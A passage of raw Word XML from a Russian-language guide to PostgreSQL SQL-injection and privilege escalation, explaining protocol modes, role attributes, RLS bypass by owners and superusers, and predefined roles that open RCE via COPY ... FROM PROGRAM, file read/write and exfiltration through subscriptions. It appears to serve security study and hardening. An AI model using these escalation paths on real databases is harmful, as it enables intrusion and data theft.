          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, отправленный через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Parse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Bind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, защищает от любых стандартных payload-ов в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потому что значение никогда не доходит до парсера как SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Во-вторых, граница уязвимости проходит не по СУБД и не по приложению, а по режиму конкретного драйвера в конкретном вызове. Один и тот же psycopg может в одной строке кода работать в extended-режиме, а в соседней — в simple. Детали по драйверам — в категории 3.5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В-третьих, всё, что не является значением, — имена таблиц, имена колонок, выражения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конструкции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 параметрами быть не может. Для этих контекстов extended-протокол не помогает, и они закрываются другими механизмами (см. 3.14, 3.16, раздел 5).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Роли, привилегии, предопределённые роли</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Модель прав в PostgreSQL имеет три слоя, и инъекционные цепочки эскалации работают именно за счёт прыжков между этими слоями.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Базовые привилегии на объекты.</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TRUNCATE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REFERENCES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TRIGGER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — выдаются явно через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT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на функции и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USAGE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на схемы, языки и расширения — то же. Это обычный SQL-стандарт и сам по себе вектор атаки даёт редко.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атрибуты роли.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Флаги, не привязанные к конкретному объекту: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SUPERUSER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CREATEDB</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REPLICATION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 Самый опасный, очевидно, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обладатель обходит вообще все проверки. На managed-платформах (RDS, Cloud SQL, Supabase) клиентский «admin» по умолчанию не имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и многие пост-эксплуатационные техники против self-hosted кластеров на managed ломаются.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pP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 отключает Row-Level Security для роли. Важный нюанс: эта привилегия неявно действует и без явного флага — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обходит RLS всегда, а owner таблицы обходит RLS на собственной таблице по умолчанию (исключение — если на таблице установлен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Это означает, что RLS обходим ещё до любых CVE: достаточно, чтобы запрос выполнялся под суперюзером или под владельцем таблицы. Контекст для 3.17.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Предопределённые роли.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PostgreSQL поставляется с набором ролей, в которые можно добавить пользователя через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT role_name TO user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, чтобы выдать целевую группу привилегий, не делая его суперюзером. Появлялись постепенно, и каждая открывает свою поверхность атаки:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pP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(с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG 11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — разрешает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY ... FROM PROGRAM</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COPY ... TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Член этой роли получает RCE одним SQL-запросом (см. 3.7.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pP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(с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG 11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — разрешают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COPY ... FROM '/path'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Канал чтения и записи произвольных файлов (см. 3.6.3, 3.6.4).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pP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pg_write_all_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG 14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — снимают необходимость в индивидуальных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT SELECT/INSERT/UPDATE/DELETE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на все таблицы. Удобство для аналитиков, крупный канал утечки данных при компрометации application-роли.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_database_owner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG 14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — неявная роль, членом которой автоматически является owner текущей БД. Используется в template-сценариях.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_create_subscription</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG 16</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SUBSCRIPTION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для логической репликации. При злоупотреблении даёт канал эксфильтрации через выгрузку в чужой кластер.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_use_reserved_connections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG 16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — резервные коннекты, выделенные через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">reserved_connections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Не вектор атаки сам по себе, но фактор в DoS-моделях.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_maintain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — даёт привилегию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MAINTAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, позволяющую запускать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VACUUM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ANALYZE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REINDEX</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CLUSTER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REFRESH MATERIALIZED VIEW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LOCK TABLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Открывает новую поверхность для атак через index expressions (концептуальный наследник CVE-2022-1552, см. 3.13.3).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Привилегии PUBLIC.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> В PostgreSQL существует виртуальная «роль»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членом которой неявно является каждый пользователь. По умолчанию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имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CONNECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на любую базу (если не отозван) и — до PG 15 —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схему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Это означает, что без явного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">REVOKE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> минимально аутентифицированный пользователь может создавать объекты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Историческая причина множества цепочек эскалации (см. 2.4 и 3.13.2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Дефолты для application-роли.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Стандартная роль для application-сервера (то, что вы создаёте через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE USER app_user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) не имеет ни </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, ни одной из перечисленных предопределённых ролей. Чтобы инъекция в application-роль превратилась в RCE через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
